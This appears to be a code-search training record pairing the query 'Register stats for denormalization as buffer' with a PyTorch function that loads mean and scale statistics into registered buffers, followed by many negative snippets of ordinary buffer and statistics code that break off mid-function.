"0.5902466", "0.5901212", "0.5899774", "0.5889168", "0.5887764", "0.58847934", "0.5882299", "0.58733845", "0.58728945", "0.58614886", "0.5859203", "0.5856755", "0.58557904" ]
0.73184675
1
Register stats for denormalization as buffer.
def register_stats(self, stats): assert stats.endswith(".h5") or stats.endswith(".npy") if stats.endswith(".h5"): mean = read_hdf5(stats, "mean").reshape(-1) scale = read_hdf5(stats, "scale").reshape(-1) else: mean = np.load(stats)[0].reshape(-1) scale = np.load(stats)[1].reshape(-1) self.register_buffer("mean", torch.from_numpy(mean).float()) self.register_buffer("scale", torch.from_numpy(scale).float()) logging.info("Successfully registered stats as buffer.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _cast_buffers(self,\n dtype: Optional[torch.dtype] = None,\n memo: Optional[Set] = None) -> None:\n if memo is None:\n memo = set()\n for module in self.modules():\n if module is not self and isinstance(module, XlaFullyShardedDataParallel):\n # Allow any child FSDP instances to handle their own buffers.\n module._cast_buffers(dtype=dtype, memo=memo)\n elif module not in memo:\n memo.add(module)\n for name, buf in module.named_buffers(recurse=False):\n if buf is None:\n continue\n if torch.is_floating_point(buf):\n orig_dtype = buf.dtype\n cast_dtype = dtype or self.buffer_dtype\n if orig_dtype != cast_dtype:\n buf = buf.to(cast_dtype)\n buf._orig_dtype = orig_dtype\n if buf.device != self.xla_device:\n buf = buf.to(self.xla_device)\n setattr(module, name, buf)", "def add_memory(self, **kwarg):\n for name, obs in kwarg.items():\n self.buffers[name] = np.concatenate((self.buffers[name], obs), axis=0)\n # get recent memory\n return self", "def generate_statistics_in_memory(\n record_batch: pa.RecordBatch,\n options: stats_options.StatsOptions = stats_options.StatsOptions()\n) -> statistics_pb2.DatasetFeatureStatisticsList:\n stats_generators = cast(List[stats_generator.CombinerStatsGenerator],\n get_generators(options, in_memory=True))\n partial_stats = generate_partial_statistics_in_memory(record_batch, options,\n stats_generators)\n return extract_statistics_output(partial_stats, stats_generators)", "def create_buffers(self):", "def append_buffer(self, buffer):\n\n first_data_idx = self.data[0][-1] + 1 if self.__len__() > 0 else 0\n\n d0 = [first_data_idx + i for i, _ in enumerate(buffer.memory)] # indexes\n d1 = [b[0] for b in buffer.memory] # actions\n d2 = [b[1][0] for b in buffer.memory] # speeds\n d3 = [b[1][3] for b in buffer.memory] # images\n d4 = [b[3] or b[4] for b in buffer.memory] # eoes\n d5 = [b[2] for b in buffer.memory] # rewards\n d6 = [b[5] for b in buffer.memory] # infos\n d7 = [b[1][1] for b in buffer.memory] # gears\n d8 = [b[1][2] for b in buffer.memory] # rpms\n d9 = [b[3] for b in buffer.memory] # terminated\n d10 = [b[4] for b in buffer.memory] # truncated\n\n if self.__len__() > 0:\n self.data[0] += d0\n self.data[1] += d1\n self.data[2] += d2\n self.data[3] += d3\n self.data[4] += d4\n self.data[5] += d5\n self.data[6] += d6\n self.data[7] += d7\n self.data[8] += d8\n self.data[9] += d9\n self.data[10] += d10\n else:\n self.data.append(d0)\n self.data.append(d1)\n self.data.append(d2)\n self.data.append(d3)\n self.data.append(d4)\n self.data.append(d5)\n self.data.append(d6)\n self.data.append(d7)\n self.data.append(d8)\n self.data.append(d9)\n self.data.append(d10)\n\n to_trim = self.__len__() - self.memory_size\n if to_trim > 0:\n self.data[0] = self.data[0][to_trim:]\n self.data[1] = self.data[1][to_trim:]\n self.data[2] = self.data[2][to_trim:]\n self.data[3] = self.data[3][to_trim:]\n self.data[4] = self.data[4][to_trim:]\n self.data[5] = self.data[5][to_trim:]\n self.data[6] = self.data[6][to_trim:]\n self.data[7] = self.data[7][to_trim:]\n self.data[8] = self.data[8][to_trim:]\n self.data[9] = self.data[9][to_trim:]\n self.data[10] = self.data[10][to_trim:]\n\n return self", "def append_buffer(self, buffer):\n\n first_data_idx = self.data[0][-1] + 1 if self.__len__() > 0 else 0\n\n d0 = [first_data_idx + i for i, _ in enumerate(buffer.memory)] # indexes\n d1 = [b[0] for b in buffer.memory] # actions\n d2 = [b[1][0] for b in buffer.memory] # speeds\n d3 = [b[1][2] for b in buffer.memory] # lidar\n d4 = [b[3] or b[4] for b in buffer.memory] # eoes\n d5 = [b[2] for b in buffer.memory] # rewards\n d6 = [b[5] for b in buffer.memory] # infos\n d7 = [b[1][1] for b in buffer.memory] # progress\n d8 = [b[3] for b in buffer.memory] # terminated\n d9 = [b[4] for b in buffer.memory] # truncated\n\n if self.__len__() > 0:\n self.data[0] += d0\n self.data[1] += d1\n self.data[2] += d2\n self.data[3] += d3\n self.data[4] += d4\n self.data[5] += d5\n self.data[6] += d6\n self.data[7] += d7\n self.data[8] += d8\n self.data[9] += d9\n else:\n self.data.append(d0)\n self.data.append(d1)\n self.data.append(d2)\n self.data.append(d3)\n self.data.append(d4)\n self.data.append(d5)\n self.data.append(d6)\n self.data.append(d7)\n self.data.append(d8)\n self.data.append(d9)\n\n to_trim = self.__len__() - self.memory_size\n if to_trim > 0:\n self.data[0] = self.data[0][to_trim:]\n self.data[1] = self.data[1][to_trim:]\n self.data[2] = self.data[2][to_trim:]\n self.data[3] = self.data[3][to_trim:]\n self.data[4] = self.data[4][to_trim:]\n self.data[5] = self.data[5][to_trim:]\n self.data[6] = self.data[6][to_trim:]\n self.data[7] = self.data[7][to_trim:]\n self.data[8] = self.data[8][to_trim:]\n self.data[9] = self.data[9][to_trim:]\n\n return self", "def register_filters(self):\n n = 0\n # prepare for pytorch\n for k in self.phi_f.keys():\n if type(k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n self.phi_f[k] = torch.from_numpy(\n self.phi_f[k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), self.phi_f[k])\n n += 1\n for psi_f in self.psi1_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1\n for psi_f in self.psi2_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1", "def __init__(self, T, B, N):\n\n super().__init__()\n self.register_buffer('weight', torch.ones(T, B))\n self.register_buffer('target_output_prob', torch.zeros(T, B))\n self.register_buffer('target_output_entropy', torch.zeros(T, B))\n self.register_buffer('target_output_grad_logits', torch.zeros(T, B, N))\n self.register_buffer('target_output_grad_prob', torch.zeros(T, B, N))\n self.register_buffer('target_output_grad_entropy', torch.zeros(T, B, N))\n self.register_buffer('behaviour_output_prob', torch.zeros(T, B))\n self.register_buffer('importance_weights', torch.zeros(T, B))\n self.register_buffer('returns', torch.zeros(T, B))\n self.register_buffer('advantages', torch.zeros(T, B))\n self.register_buffer('pg_loss', torch.zeros(1))\n self.register_buffer('value_loss', torch.zeros(1))\n self.register_buffer('entropy_loss', torch.zeros(1))\n self.register_buffer('grad_value', torch.zeros(T + 1, B))\n self.register_buffer('grad_target_output', torch.zeros(T, B, N))", "def register_extra_weights(self):\n device = self.weight.device\n\n # Initialize and register the learned parameters 'a' (SCALE) and 'b' (OFFSET)\n # for calculating alpha as a function of context size.\n a = torch.Tensor([0.0]).to(device)\n b = torch.Tensor([0.0]).to(device)\n self.register_parameter(name='a', param=torch.nn.Parameter(a, requires_grad=True))\n self.register_parameter(name='b', param=torch.nn.Parameter(b, requires_grad=True))\n\n # Variables to store the context moments to use for normalizing the target.\n self.register_buffer(name='batch_mean',\n tensor=torch.zeros((1, self.num_features, 1, 1), requires_grad=True, device=device))\n self.register_buffer(name='batch_var',\n tensor=torch.ones((1, self.num_features, 1, 1), requires_grad=True, device=device))\n\n # Variable to save the context size.\n self.register_buffer(name='context_size',\n tensor=torch.zeros((1), requires_grad=False, device=device))", "def __init__(self, aggregation_depth, include_bytes=True):\n\n self._prev_stats = {}\n self._aggregation_depth = aggregation_depth\n self._include_bytes = include_bytes\n\n self.init_cur_stats()", "def set_batch_stats(self, x):\n\n if self.set_stats_f is None:\n self.set_stats_f = theano.function(\n inputs=[self.input],\n updates=[(self.bm, self.m), (self.bv, self.v)]\n )\n\n self.set_stats_f(x.astype(dtype))", "def _setup_stats(self) -> None:\n\n # Save statistics\n self.mass = np.array([0])\n self.mass_balance = np.array([0])\n self.mass_balance_trend = np.array([0])", "def _cast_buffers(\n self,\n device: Optional[torch.device] = None,\n dtype: Optional[Dict[str, torch.dtype]] = None,\n memo: Optional[Set] = None,\n recurse: bool = True,\n ) -> None:\n if memo is None:\n memo = set()\n for module in self.modules():\n if module is not self and isinstance(module, FullyShardedDataParallel) and recurse:\n # Allow any child FSDP instances to handle their own buffers.\n module._cast_buffers(device=device, dtype=dtype, memo=memo, recurse=recurse)\n elif module not in memo:\n memo.add(module)\n for name, buf in module.named_buffers(recurse=False):\n if buf is None:\n continue\n buf = buf.to(device=device or self.compute_device)\n if name not in self._buffer_name_to_orig_dtype:\n self._buffer_name_to_orig_dtype[name] = buf.dtype\n # If given, cast buffer to the given dtype. This is used to\n # suppport mixed precision for buffers\n # (given by self.mixed_precision.buffer_dtype) and also used\n # to restore the buffer dtype to the original precision for\n # state_dict() calls.\n # Note that non-floating point buffers are not casted.\n if torch.is_floating_point(buf):\n # We are restoring the original buffer type in\n # preparation for checkpoint.\n if dtype:\n buf = buf.to(dtype=dtype[name])\n # Note that we don't pass in self.mixed_precision.buffer_dtype\n # recursively into _cast_buffers, as we want to respect\n # mp config for child FSDP instances.\n elif self._mixed_precision_enabled_for_buffers():\n buf = buf.to(self.mixed_precision.buffer_dtype)\n\n setattr(module, name, buf)", "def Buffer(self) -> _n_0_t_7[_n_0_t_6]:", "def Buffer(self) -> _n_0_t_7[_n_0_t_6]:", "def Buffer(self) -> _n_0_t_7[_n_0_t_6]:", "def fillBuffer():\n buff[bufferCounter].next = dataIn", "def stats(self, stats):\n self._stats = stats", "def _writeBuffers(self):\r\n\r\n logger.info('Writing buffers to disk...')\r\n\r\n for ds in self.datasets.keys():\r\n\r\n if len(self.datasetBuffer[ds]) > 0:\r\n\r\n # write the buffers to disk\r\n self._writeBuffer(self.datasets[ds], ds, self.datasetBuffer[ds])\r\n\r\n # increment the indexes\r\n self.idxs[ds] += len(self.datasetBuffer[ds])\r\n\r\n # Reset the buffers and feature counts\r\n self.datasetBuffer[ds] = []\r\n\r\n self.totalFeatures = 0", "def _add_buffer(self, p_buffer_element:PyTorchIOElement):\r\n\r\n self._buffer.add_element(p_buffer_element)", "def _flush_stats(self, train=True):\n\t\tif train:\n\t\t\tself.train_accuracy.flush_buffer()\n\t\t\tself.train_epochs.flush_buffer()\n\t\t\tself.train_loss.flush_buffer()\n\t\t\tself.train_confusion_matrix.flush_buffer()\n\t\t\tself.learning_rate.flush_buffer()\n\t\telse:\n\t\t\tself.val_accuracy.flush_buffer()\n\t\t\tself.val_epochs.flush_buffer()\n\t\t\tself.val_loss.flush_buffer()\n\t\t\tself.val_confusion_matrix.flush_buffer()\n\n\t\tif self.plot:\n\t\t\tself._plot(train=train)", "def append_buffer(self, buffer):\n\n first_data_idx = self.data[0][-1] + 1 if self.__len__() > 0 else 0\n\n d0 = [first_data_idx + i for i, _ in enumerate(buffer.memory)] # indexes\n d1 = [b[0] for b in buffer.memory] # actions\n d2 = [b[1][0] for b in buffer.memory] # speeds\n d3 = [b[1][1] for b in buffer.memory] # lidar\n d4 = [b[3] or b[4] for b in buffer.memory] # eoes (terminated or truncated)\n d5 = [b[2] for b in buffer.memory] # rewards\n d6 = [b[5] for b in buffer.memory] # infos\n d7 = [b[3] for b in buffer.memory] # terminated\n d8 = [b[4] for b in buffer.memory] # truncated\n\n if self.__len__() > 0:\n self.data[0] += d0\n self.data[1] += d1\n self.data[2] += d2\n self.data[3] += d3\n self.data[4] += d4\n self.data[5] += d5\n self.data[6] += d6\n self.data[7] += d7\n self.data[8] += d8\n else:\n self.data.append(d0)\n self.data.append(d1)\n self.data.append(d2)\n self.data.append(d3)\n self.data.append(d4)\n self.data.append(d5)\n self.data.append(d6)\n self.data.append(d7)\n self.data.append(d8)\n\n to_trim = self.__len__() - self.memory_size\n if to_trim > 0:\n self.data[0] = self.data[0][to_trim:]\n self.data[1] = self.data[1][to_trim:]\n self.data[2] = self.data[2][to_trim:]\n self.data[3] = self.data[3][to_trim:]\n self.data[4] = self.data[4][to_trim:]\n self.data[5] = self.data[5][to_trim:]\n self.data[6] = self.data[6][to_trim:]\n self.data[7] = self.data[7][to_trim:]\n self.data[8] = self.data[8][to_trim:]\n\n return self", "def __init__ (self, pipe, histogram_buffer) :\n\t\tBasicDevice.__init__(self, pipe)\n\t\t# saving the buffer where the spectrum will be saved\n\t\tself.buffer = histogram_buffer", "def stats(self, stats):\n\n self._stats = stats", "def _buffer_all(self):\n self._buffer()", "def set_scribe_buffer(buffer_enabled):\r\n LogOptions._SCRIBE_BUFFER = buffer_enabled", "def flush(self) -> None:\n super().put(self.buffer)\n self.buffer = np.ndarray((0, 1), dtype=np.int16)", "def add_stats(self):\n units = self.get_unit_map()\n for metric in self.raw_metrics:\n unit, metric_type = units.get(metric, (DEFAULT_UNIT, DEFAULT_TYPE))\n if metric_type == \"counter\":\n # Unit/Second\n unit = \"/\".join((unit, \"Second\"))\n self.add_derive_value(metric, unit, self.raw_metrics[metric], rate=True)\n else:\n self.add_gauge_value(metric, unit, self.raw_metrics[metric])", "def register_statistic(self, func=None, shape=(-1,)):\n if func is not None:\n return self.register_statistic()(func)\n\n def decorator(func):\n\n name = func.__name__\n\n def _wrapper(cluster):\n out = func(cluster)\n self.store.memory_store.store(cluster, **{name: out})\n\n # Add the statistics.\n stats = self.store.items['statistics']\n stats.add(name, _wrapper, shape)\n # Register it in the global cluster store.\n self.store.register_field(name, 'statistics')\n # Compute it on all existing clusters.\n stats.store_all(name=name, mode='force')\n info(\"Registered statistic `{}`.\".format(name))\n\n return decorator", "def fill_buffer(self, num_domains: int):\n if self._randomizer is None:\n raise pyrado.TypeErr(msg=\"The randomizer must not be None to call fill_buffer()!\")\n if not isinstance(num_domains, int) or num_domains < 0:\n raise pyrado.ValueErr(given=num_domains, g_constraint=\"0 (int)\")\n\n self._randomizer.randomize(num_domains)\n self._buffer = self._randomizer.get_params(-1, fmt=\"list\", dtype=\"numpy\")\n self._ring_idx = 0", "def register_process_statistics():\n if resource is None:\n log.warning(\n 'Unable to import resource module, memory diags not available'\n )\n return\n\n rusage_fields = [\n ('Execution time in user mode (seconds)', 'ru_utime'),\n ('Execution time in kernel mode (seconds)', 'ru_stime'),\n ('Maximum Resident Set Size (KB)', 'ru_maxrss'),\n ('Soft page faults', 'ru_minflt'),\n ('Hard page faults', 'ru_majflt'),\n ('Input events', 'ru_inblock'),\n ('Output events', 'ru_oublock'),\n ('Voluntary context switches', 'ru_nvcsw'),\n ('Involuntary context switches', 'ru_nivcsw'),\n ]\n\n def dump(log):\n process = resource.getrusage(resource.RUSAGE_SELF)\n for name, field in rusage_fields:\n data = getattr(process, field, 'None')\n log.info('%s: %s', name, data)\n\n register_diags('Process Statistics', dump)", "def _allocate_buffer_memory(self):\n for channel in self._channels_dict.values():\n if channel.enabled:\n channel.allocate(self._num_captures, self._num_samples)", "def pc_output_buffers_full_avg(self, *args) -> \"std::vector< float,std::allocator< float > >\":\n return _beamforming_swig.randomsampler_sptr_pc_output_buffers_full_avg(self, *args)", "def Register(parsed_flags):\n if not parsed_flags.perfspect:\n return\n logging.info('Registering PerfSpect telemetry collector')\n telemetry_collector = PerfspectCollector()\n events.before_phase.connect(\n telemetry_collector.Before, events.RUN_PHASE, weak=False)\n events.after_phase.connect(\n telemetry_collector.After, events.RUN_PHASE, weak=False)", "def __init__(self, n_taps, dtype='float'):\n self.buffer = np.zeros(n_taps, dtype)\n self.n_taps = n_taps", "def pc_output_buffers_full_var(self, *args) -> \"std::vector< float,std::allocator< float > >\":\n return _beamforming_swig.randomsampler_sptr_pc_output_buffers_full_var(self, *args)", "def sendBuffer():\n dislin.sendbf()", "def Register(parsed_flags):\n if not parsed_flags.mpstat:\n return\n\n logging.debug('Registering mpstat collector.')\n\n collector = MpstatCollector(\n interval=parsed_flags.mpstat_interval,\n per_interval_samples=parsed_flags.mpstat_publish_per_interval_samples)\n events.before_phase.connect(collector.Start, stages.RUN, weak=False)\n events.after_phase.connect(collector.Stop, stages.RUN, weak=False)\n if parsed_flags.mpstat_publish:\n events.benchmark_samples_created.connect(collector.Analyze, weak=False)", "def _apply_buffers(node):\n buffers = \"\"\n total_mbufs = node[\"cpu\"][\"total_mbufs\"]\n\n # If the total mbufs is not 0 or less than the default, set num-bufs\n logging.debug(\"Total mbufs: {}\".format(total_mbufs))\n if total_mbufs != 0 and total_mbufs > 16384:\n buffers += \" buffers-per-numa {}\".format(total_mbufs)\n\n return buffers", "def buffer(\n self,\n distance,\n resolution=...,\n quadsegs=...,\n cap_style=...,\n join_style=...,\n mitre_limit=...,\n single_sided=...,\n ): # -> BaseGeometry:\n ...", "def update_link_statistics(self):\n if (self.track):\n key = self.id + \":\" + self.source + \"->\" + self.destination + \":\" \\\n + globals.BUFFEROCCUPANCY\n globals.statistics[key][globals.systime] = self.buffersize", "def to(self, *args, **kwargs):\n super()\n buffers = dict(self.named_buffers())\n if not isinstance(self._log_std, torch.nn.Parameter):\n self._log_std = buffers['log_std']\n self._min_std_param = buffers['min_std_param']\n self._max_std_param = buffers['max_std_param']", "def init_buffer(self):\n \n self.shape.buf = [pi3d.Buffer(self.shape, self.verts, self.texcoords, self.inds, self.norms)]\n self.shape.set_draw_details(self.shader, [self.spritesheet.img])", "def prepareUniformBuffers(self):\n # Vertex shader uniform buffer block\n uboVSSize = sum([glm.sizeof(ubo) for ubo in self.uboVS.values()])\n bufferInfo = vk.VkBufferCreateInfo(\n sType = vk.VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO,\n size = uboVSSize,\n # This buffer will be used as a uniform buffer\n usage = vk.VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT\n )\n # Create a new buffer\n self.uniformBufferVS['buffer'] = vk.vkCreateBuffer(self.device, bufferInfo, None)\n # Get memory requirements including size, alignment and memory type\n memReqs = vk.vkGetBufferMemoryRequirements(self.device, self.uniformBufferVS['buffer'])\n # Get the memory type index that supports host visibile memory access\n # Most implementations offer multiple memory types and selecting the correct one to allocate memory from is crucial\n # We also want the buffer to be host coherent so we don't have to flush (or sync after every update.\n #Note: This may affect performance so you might not want to do this in a real world application that updates buffers on a regular base\n allocInfo = vk.VkMemoryAllocateInfo(\n sType = vk.VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO,\n pNext = None,\n allocationSize = memReqs.size,\n memoryTypeIndex = self.vulkanDevice.getMemoryType(memReqs.memoryTypeBits, vk.VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | vk.VK_MEMORY_PROPERTY_HOST_COHERENT_BIT)\n )\n # Allocate memory for the uniform buffer\n self.uniformBufferVS['memory'] = vk.vkAllocateMemory(self.device, allocInfo, None)\n # Bind memory to buffer\n vk.vkBindBufferMemory(self.device, self.uniformBufferVS['buffer'], self.uniformBufferVS['memory'], 0)\n # Store information in the uniform's descriptor that is used by the descriptor set\n self.uniformBufferVS['descriptor'] = vk.VkDescriptorBufferInfo(\n buffer = self.uniformBufferVS['buffer'],\n offset = 0,\n range = uboVSSize\n )\n\n self.updateUniformBuffers()", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_I2di6h8fI().pack(_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def stats(self, s_sample, d_sample, x_sample, wav_len):\n\t\tpass", "def store_from_other_buffer(self, buffer):\n assert self.ptr < self.max_size\n self.obs_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.obs_buf[:buffer.ptr]\n self.act_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.act_buf[:buffer.ptr]\n self.rew_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.rew_buf[:buffer.ptr]\n self.val_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.val_buf[:buffer.ptr]\n self.logp_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.logp_buf[:buffer.ptr]\n\n self.adv_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.adv_buf[:buffer.ptr]\n self.ret_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.ret_buf[:buffer.ptr]\n\n # Update internal index\n self.path_start_idx += buffer.ptr\n self.ptr += buffer.ptr", "def buffer_input(self, node, direction, values):\n self.num_buffered_inputs += len(values)\n self.buffered_input.setdefault(node, {}).setdefault(direction,\n []).extend(values)", "def _initialize_buffers(self) -> None:", "def _initialise_sufficient_statistics(self):\n stats = super()._initialise_sufficient_statistics()\n\n stats['B'] = {\n 'numer': [\n np.zeros((self.n_states, self.n_features[i]))\n for i in range(self.n_emissions)\n ],\n 'denom': [\n np.zeros((self.n_states, self.n_features[i]))\n for i in range(self.n_emissions)\n ],\n }\n\n return stats", "def fill_buffer_mono(self, block):\n\n if block.size < self.block_size:\n # print('Fill up last block')\n block = np.concatenate((block, np.zeros((1, (self.block_size - block.size)))), 1)\n\n if self.processCounter == 0:\n # insert first block to buffer\n self.buffer[self.block_size:self.block_size * 2] = block\n\n else:\n # shift buffer\n self.buffer = np.roll(self.buffer, -self.block_size)\n # insert new block to buffer\n self.buffer[self.block_size:self.block_size * 2] = block\n # shift FDLs\n self.FDL_left = np.roll(self.FDL_left, self.block_size + 1)\n self.FDL_right = np.roll(self.FDL_right, self.block_size + 1)\n\n # transform buffer into freq domain and copy to FDLs\n self.FDL_left[0:self.block_size + 1] = self.FDL_right[0:self.block_size + 1] = self.bufferFftPlan(\n self.buffer)", "def Set(collector: stats_collector.StatsCollector):\n global _stats_singleton\n\n with _init_lock:\n if _stats_singleton is None:\n _stats_singleton = collector\n for metadata in _metadatas:\n _stats_singleton.RegisterMetric(metadata)\n else:\n # TODO(user): Throw an exception instead, once it is confirmed that it\n # is ok to do so.\n logging.warning(\"Tried to re-initialize global stats collector.\")", "def reset_memory_statistics(sender, **kwargs): # pylint: disable=unused-argument\n MemoryUsageData.start_counting()", "def add(self, data):\n \n # Check buffer is active\n if self._settings['active'] == 'False':\n return\n \n # Timestamp = now\n timestamp = round(time.time(),2)\n \n self._log.debug(\"Server \" + \n self._settings['domain'] + self._settings['path'] + \n \" -> buffer data: \" + str(data) + \n \", timestamp: \" + str(timestamp))\n \n # Append data set [timestamp, [node, val1, val2, val3,...]] \n # to _data_buffer\n self._data_buffer.append([timestamp, data])", "def _writeBuffer(self, dataset, datasetName, buf, idxName, sparse=False):\n # compute end index\n if type(buf) is list:\n end = self.idxs[idxName] + len(buf)\n else:\n end = self.idxs[idxName] + buf.shape[0]", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_I2di6h8fI().pack(_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _cache_silence_sample_data(self):\n self.silence_4_sample_buffer = self._synthesize_silence(4.0 * self.dot_time_in_msec)\n self.silence_2_sample_buffer = self._synthesize_silence(2.0 * self.dot_time_in_msec)\n self.silence_1_sample_buffer = self._synthesize_silence(self.dot_time_in_msec)", "def addChunk(self, direction):\n pass\n\n ## get size of actual map\n ## create array of fitting size\n ## stack created array to map", "def __init__(self, buffer_size):\n self.num_experiences = 0\n self.buffer = deque(maxlen=buffer_size)", "def _debugmallocstats(): # real signature unknown; restored from __doc__\n pass", "def add_histogram(self, tag, values, global_step=None, bins='tensorflow'):\n values = make_np(values)\n self.vis.histogram(make_np(values), opts={'title': tag})", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)\n self.last_recent_batch = 0", "def RegisterMetric(metadata):\n with _init_lock:\n _metadatas.append(metadata)\n if _stats_singleton is not None:\n _stats_singleton.RegisterMetric(metadata)", "def _cache_dot_dash_sample_data(self):\n self._get_pulse_shaping_waveform()\n self.dot_sample_buffer = self._synthesize_tone(self.dot_time_in_msec)\n self.dash_sample_buffer = self._synthesize_tone(3.0 * self.dot_time_in_msec)", "def _update_base_stats(self, base_stats):\n self.total_samples += base_stats[\"sample_size\"]\n self.sample = base_stats[\"sample\"]\n self._empty_line_count += base_stats[\"empty_line_count\"]\n self.memory_size += base_stats[\"memory_size\"]", "def generate_partial_statistics_in_memory(\n record_batch: pa.RecordBatch, options: stats_options.StatsOptions,\n stats_generators: List[stats_generator.CombinerStatsGenerator]\n) -> List[Any]:\n result = []\n if options.feature_allowlist:\n columns, features = [], []\n for feature_name in options.feature_allowlist:\n c = arrow_util.get_column(record_batch, feature_name, missing_ok=True)\n if c is not None:\n columns.append(c)\n features.append(feature_name)\n record_batch = pa.RecordBatch.from_arrays(columns, features)\n for generator in stats_generators:\n result.append(\n generator.add_input(generator.create_accumulator(), record_batch))\n return result", "def set_min_output_buffer(self, *args) -> \"void\":\n return _beamforming_swig.randomsampler_sptr_set_min_output_buffer(self, *args)", "def add_nfb_export_data(self, signal: dict):\n signal[\"fSmoothingFactor\"] = self.smoothingFactor()\n signal[\"method\"] = self.method()\n signal[\"sTemporalSmootherType\"] = self.smootherType()", "def stats(self, s_sample, d_sample, x_sample, wav_len):\n\t\ts_STMS_sample, d_STMS_sample, x_STMS_sample = self.transfrom_stats(s_sample,\n\t\t\td_sample, x_sample, wav_len)\n\t\tself.mag_map.stats(s_STMS_sample)", "def pc_output_buffers_full(self, *args) -> \"std::vector< float,std::allocator< float > >\":\n return _beamforming_swig.randomsampler_sptr_pc_output_buffers_full(self, *args)", "def reset(self):\r\n self.buffer = np.zeros(self.nBins)\r\n self.counter = 0", "def _init_buffers(self, v, n, _):\n super()._init_buffers(v, n, _)\n\n self.vbos.append(gl.glGenBuffers(1))\n\n # init VBO 2 - dynamic color data\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.vbos[3])\n loc = self.get_attribute_location(\"carried\")\n gl.glEnableVertexAttribArray(loc)\n gl.glVertexAttribPointer(loc, 1, gl.GL_FLOAT, gl.GL_FALSE, 0, ctypes.c_void_p(0))\n gl.glVertexAttribDivisor(loc, 1)\n gl.glBufferData(gl.GL_ARRAY_BUFFER, 0, np.array([], dtype=np.float32), gl.GL_DYNAMIC_DRAW)", "def buffer(self, distance):\n return _unary_geo(arctern.ST_Buffer, self, distance)", "def _tobuffer(self, object_):\n\n raise NotImplementedError", "def __init__(self, buffer_size, random_seed=None):\n self.buffer_size = buffer_size\n self.count = 0\n self.oldPos = 0\n self.currPos = 0\n self.full = False\n self.buffer = []\n self.featCount = 3\n random.seed(random_seed)\n self.useSubBuffer = False", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2I4d().pack(_x.h_min, _x.h_max, _x.s_min, _x.s_max, _x.v_min, _x.v_max))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _report(self, registry=None, timestamp=None, flush_current_hist=False):\n registry = registry or self.registry\n if self.enable_runtime_metrics:\n col = runtime_metrics.RuntimeCollector(registry)\n col.collect()\n metrics = registry.dump_metrics()\n for key in metrics.keys():\n metric_name, metric_tags = self.decode_key(key)\n tags = self.tags\n if metric_tags:\n tags = self.tags.copy()\n tags.update(metric_tags)\n\n wf_hist = wavefront_histogram.get(key, registry)\n if wf_hist is not None:\n distributions = wf_hist.get_distribution()\n if flush_current_hist:\n distributions.extend(\n wf_hist.get_current_minute_distribution())\n for dist in distributions:\n self.wavefront_client.send_distribution(\n name=f'{self.prefix}{metric_name}',\n centroids=dist.centroids,\n histogram_granularities=self.histogram_granularities,\n timestamp=dist.timestamp,\n source=self.source,\n tags=tags)\n continue\n\n is_delta = delta.is_delta_counter(key, registry)\n for value_key in metrics[key].keys():\n if is_delta:\n self.wavefront_client.send_delta_counter(\n name=delta.get_delta_name(self.prefix, metric_name,\n value_key),\n value=metrics[key][value_key], source=self.source,\n tags=tags\n )\n # decrement delta counter\n registry.counter(key).dec(metrics[key][value_key])\n else:\n self.wavefront_client.send_metric(\n name=f'{self.prefix}{metric_name}.{value_key}',\n value=metrics[key][value_key], timestamp=timestamp,\n source=self.source, tags=tags)", "def __init__(self, buffer_size, batch_size, num_agents, seed):\n self.memory = deque(maxlen=buffer_size) # internal memory (deque)\n self.batch_size = batch_size\n self.num_agents = num_agents\n self.seed = random.seed(seed)", "def stats(self, s_sample, d_sample, 